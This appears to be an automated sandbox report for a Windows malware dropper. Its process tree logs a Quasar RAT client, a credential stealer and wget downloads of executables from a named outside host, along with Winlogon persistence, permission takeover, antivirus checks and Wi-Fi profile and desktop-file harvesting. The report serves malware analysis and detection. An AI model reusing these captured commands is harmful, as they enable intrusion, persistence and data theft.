description pid Process procid_target PID 2352 wrote to memory of 1036 2352 4363463463464363463463463.exe 79 PID 2352 wrote to memory of 1036 2352 4363463463464363463463463.exe 79 PID 2352 wrote to memory of 1036 2352 4363463463464363463463463.exe 79 PID 1036 wrote to memory of 3392 1036 ExSync.exe 80 PID 1036 wrote to memory of 3392 1036 ExSync.exe 80 PID 1036 wrote to memory of 3392 1036 ExSync.exe 80 PID 2352 wrote to memory of 332 2352 4363463463464363463463463.exe 81 PID 2352 wrote to memory of 332 2352 4363463463464363463463463.exe 81 PID 2352 wrote to memory of 332 2352 4363463463464363463463463.exe 81 PID 332 wrote to memory of 1352 332 m.exe 82 PID 332 wrote to memory of 1352 332 m.exe 82 PID 332 wrote to memory of 1352 332 m.exe 82 PID 2352 wrote to memory of 1380 2352 4363463463464363463463463.exe 83 PID 2352 wrote to memory of 1380 2352 4363463463464363463463463.exe 83 PID 2352 wrote to memory of 1380 2352 4363463463464363463463463.exe 83 PID 2352 wrote to memory of 3976 2352 4363463463464363463463463.exe 84 PID 2352 wrote to memory of 3976 2352 4363463463464363463463463.exe 84 PID 2352 wrote to memory of 3976 2352 4363463463464363463463463.exe 84 PID 1380 wrote to memory of 4536 1380 svchost.exe 85 PID 1380 wrote to memory of 4536 1380 svchost.exe 85 PID 1380 wrote to memory of 4536 1380 svchost.exe 85 PID 4536 wrote to memory of 2828 4536 svchost.exe 86 PID 4536 wrote to memory of 2828 4536 svchost.exe 86 PID 4536 wrote to memory of 2828 4536 svchost.exe 86 PID 2828 wrote to memory of 1216 2828 cmd.exe 88 PID 2828 wrote to memory of 1216 2828 cmd.exe 88 PID 2828 wrote to memory of 1216 2828 cmd.exe 88 PID 4536 wrote to memory of 3020 4536 svchost.exe 90 PID 4536 wrote to memory of 3020 4536 svchost.exe 90 PID 4536 wrote to memory of 3020 4536 svchost.exe 90 PID 3020 wrote to memory of 3792 3020 cmd.exe 92 PID 3020 wrote to memory of 3792 3020 cmd.exe 92 PID 3020 wrote to memory of 3792 3020 cmd.exe 92 PID 4536 wrote to memory of 1528 4536 svchost.exe 93 PID 4536 wrote to memory of 1528 4536 svchost.exe 93 PID 4536 wrote to memory of 1528 4536 svchost.exe 93 PID 1528 wrote to memory of 5040 1528 cmd.exe 95 PID 1528 wrote to memory of 5040 1528 cmd.exe 95 PID 1528 wrote to memory of 5040 1528 cmd.exe 95 PID 4536 wrote to memory of 4204 4536 svchost.exe 96 PID 4536 wrote to memory of 4204 4536 svchost.exe 96 PID 4536 wrote to memory of 4204 4536 svchost.exe 96 PID 4204 wrote to memory of 4832 4204 cmd.exe 98 PID 4204 wrote to memory of 4832 4204 cmd.exe 98 PID 4204 wrote to memory of 4832 4204 cmd.exe 98 PID 4536 wrote to memory of 1856 4536 svchost.exe 99 PID 4536 wrote to memory of 1856 4536 svchost.exe 99 PID 4536 wrote to memory of 1856 4536 svchost.exe 99 PID 1856 wrote to memory of 476 1856 cmd.exe 101 PID 1856 wrote to memory of 476 1856 cmd.exe 101 PID 1856 wrote to memory of 476 1856 cmd.exe 101 PID 4536 wrote to memory of 1048 4536 svchost.exe 102 PID 4536 wrote to memory of 1048 4536 svchost.exe 102 PID 4536 wrote to memory of 1048 4536 svchost.exe 102 PID 1048 wrote to memory of 4864 1048 cmd.exe 104 PID 1048 wrote to memory of 4864 1048 cmd.exe 104 PID 1048 wrote to memory of 4864 1048 cmd.exe 104 PID 4536 wrote to memory of 1424 4536 svchost.exe 105 PID 4536 wrote to memory of 1424 4536 svchost.exe 105 PID 4536 wrote to memory of 1424 4536 svchost.exe 105 PID 1424 wrote to memory of 1876 1424 cmd.exe 107 PID 1424 wrote to memory of 1876 1424 cmd.exe 107 PID 1424 wrote to memory of 1876 1424 cmd.exe 107 PID 3976 wrote to memory of 3344 3976 build_2024-07-25_20-56.exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 1316 attrib.exe 1684 attrib.exe 988 attrib.exe 332 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3312 -
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Users\Admin\AppData\Local\Temp\Files\ExSync.exe"C:\Users\Admin\AppData\Local\Temp\Files\ExSync.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Users\Admin\AppData\Local\Temp\ExSync.exe"C:\Users\Admin\AppData\Local\Temp\ExSync.exe" -l "C:\Users\Admin\AppData\Local\Temp\Files\ExSync.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3392
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\m.exe"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:332 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe4⤵
- Executes dropped EXE
PID:1352 -
C:\Users\Admin\AppData\Local\Temp\1613621604.exeC:\Users\Admin\AppData\Local\Temp\1613621604.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:3632
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:1216
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:672
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\31329958.exeC:\Users\Admin\AppData\Local\Temp\31329958.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2960 -
C:\Users\Admin\AppData\Local\Temp\1694433196.exeC:\Users\Admin\AppData\Local\Temp\1694433196.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:4428
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018023022.exeC:\Users\Admin\AppData\Local\Temp\1018023022.exe5⤵PID:10332
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"4⤵
- Looks for VirtualBox drivers on disk
- Looks for VMWare drivers on disk
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵PID:3164
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵PID:3492
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
PID:4976 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1336
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵PID:4628
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵PID:864
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4680
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵PID:2536
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
PID:744 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
PID:2072 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
PID:3448 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
PID:3936 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
PID:2648 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵PID:392
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
PID:2600 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
PID:1988 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
PID:4424 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵PID:2036
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵PID:2108
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4220
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show interfaces5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\build_2024-07-25_20-56.exe"C:\Users\Admin\AppData\Local\Temp\Files\build_2024-07-25_20-56.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\build_2024-07-25_20-56.exe" & rd /s /q "C:\ProgramData\BGDHDAFIDGDB" & exit4⤵PID:3344
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1684
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 21244⤵
- Program crash
PID:4484
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\boot.exe"C:\Users\Admin\AppData\Local\Temp\Files\boot.exe"3⤵
- Executes dropped EXE
PID:240 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1776.tmp\1777.tmp\1778.bat C:\Users\Admin\AppData\Local\Temp\Files\boot.exe"4⤵PID:1224
-
C:\Windows\explorer.exeexplorer.exe5⤵
- Modifies registry class
PID:4572
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget "http://quanlyphongnet.com/net/Google Chrome.exe" -O "Google Chrome.exe"5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1080
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget "http://quanlyphongnet.com/net/Coc Coc.exe" -O "Coc Coc.exe"5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:4564
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget "http://quanlyphongnet.com/net/run.exe" -O "run.exe"5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:4484
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget "http://quanlyphongnet.com/net/run2.exe" -O "run2.exe"5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:2692
-
-
C:\Users\Admin\AppData\Roaming\run.exerun.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1416 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D2A.tmp\5D2B.tmp\5D2C.bat C:\Users\Admin\AppData\Roaming\run.exe"6⤵PID:1516
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrator:(OI)(CI)F /t /c7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1296
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrators:(OI)(CI)F /t /c7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1664
-
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:4400
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Administrator\Desktop\Google Chrome.exe"7⤵
- Views/modifies file attributes
PID:1316
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Administrator\Desktop\Coc Coc.exe"7⤵
- Views/modifies file attributes
PID:1684
-
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:1744
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "\Microsoft\Windows\Task Manager\Interactive" /F7⤵PID:3344
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "\Microsoft\Windows\USB\Usb-Notifications" /F7⤵PID:2832
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "\Microsoft\Windows\Feedback\Siuf\DmClient" /F7⤵PID:3880
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "Fix Getting Devices" /F7⤵PID:3340
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "Windows Optimize" /F7⤵PID:644
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "ChangeWallpaper" /F7⤵PID:4680
-
-
-
-
C:\Users\Admin\AppData\Roaming\run2.exerun2.exe5⤵
- Executes dropped EXE
PID:836 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6289.tmp\628A.tmp\628B.bat C:\Users\Admin\AppData\Roaming\run2.exe"6⤵
- Drops file in System32 directory
PID:3500 -
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/wallx.exe" -O "wallx.exe"7⤵
- Executes dropped EXE
PID:2108
-
-
C:\Users\Admin\AppData\Roaming\wallx.exewallx.exe7⤵
- Executes dropped EXE
PID:3184 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6BC0.tmp\6BC1.tmp\6BC2.bat C:\Users\Admin\AppData\Roaming\wallx.exe"8⤵PID:784
-
C:\Users\Admin\AppData\Roaming\WallpaperX.exeWallpaperX.exe9⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/boot.exe" -O "boot.exe"7⤵
- Executes dropped EXE
PID:3760
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/FixCSM.exe" -O "FixCSM.exe"7⤵
- Executes dropped EXE
PID:1996
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/del.exe" -O "C:\Windows\System32\del.exe"7⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2944
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/Coc Coc XG.exe" -O "Coc Coc XG.exe"7⤵
- Executes dropped EXE
PID:864
-
-
C:\Windows\system32\takeown.exetakeown /F "C:\windows\system32\userinit.exe"7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1748
-
-
C:\Windows\system32\icacls.exeicacls "C:\windows\system32\userinit.exe" /grant administrators:F7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1988
-
-
C:\FixCSM.exeC:\FixCSM.exe7⤵
- Executes dropped EXE
PID:2372 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE57.tmp\AE58.tmp\AE59.bat C:\FixCSM.exe"8⤵PID:5000
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\System32\boot.exe,C:\Program Files (x86)\CSMClient\CyberStation.exe," /f9⤵
- Modifies WinLogon for persistence
PID:3432
-
-
-
-
C:\Windows\system32\timeout.exeTIMEOUT /T 107⤵
- Delays execution with timeout.exe
PID:4596
-
-
C:\Windows\System32\del.exeC:\Windows\System32\del.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1188 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D538.tmp\D539.tmp\D53A.bat C:\Windows\System32\del.exe"8⤵PID:1416
-
C:\Windows\system32\timeout.exeTIMEOUT /T 59⤵
- Delays execution with timeout.exe
PID:5040
-
-
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Administrator\AppData\Roaming\config.txt"7⤵
- Views/modifies file attributes
PID:988
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Administrator\AppData\Roaming\log.txt"7⤵
- Views/modifies file attributes
PID:332
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\uctgkfb7.exe"C:\Users\Admin\AppData\Local\Temp\Files\uctgkfb7.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1724 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows" /tr "C:\Users\Admin\Windows.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3480
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:652 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1692
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5028 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\vtoroy.exe"C:\Users\Admin\AppData\Local\Temp\Files\vtoroy.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4360
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ZinTask.exe"C:\Users\Admin\AppData\Local\Temp\Files\ZinTask.exe"3⤵
- Executes dropped EXE
PID:1500 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 2444⤵
- Program crash
PID:3468
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\d4cye08a.exe"C:\Users\Admin\AppData\Local\Temp\Files\d4cye08a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3268
-
-
C:\Users\Admin\AppData\Local\Temp\Files\splwow64_1.exe"C:\Users\Admin\AppData\Local\Temp\Files\splwow64_1.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1444 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat4⤵
- System Location Discovery: System Language Discovery
PID:228 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3724
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
- System Location Discovery: System Language Discovery
PID:1156
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵PID:2072
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6076985⤵PID:1552
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "MaskBathroomCompositionInjection" Participants5⤵PID:2076
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q5⤵PID:1176
-
-
C:\Users\Admin\AppData\Local\Temp\607698\Waters.pifWaters.pif Q5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4504
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:1168
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client_protected.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client_protected.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3484 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 13964⤵
- Program crash
PID:2936
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ctx.exe"C:\Users\Admin\AppData\Local\Temp\Files\ctx.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2824 -
C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"5⤵
- Executes dropped EXE
PID:3964 -
C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3292
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main5⤵PID:1212
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main6⤵
- Blocklisted process makes network request
PID:3716 -
C:\Windows\system32\netsh.exenetsh wlan show profiles7⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\410826464235_Desktop.zip' -CompressionLevel Optimal7⤵
- Command and Scripting Interpreter: PowerShell
PID:3520
-
-
-
-
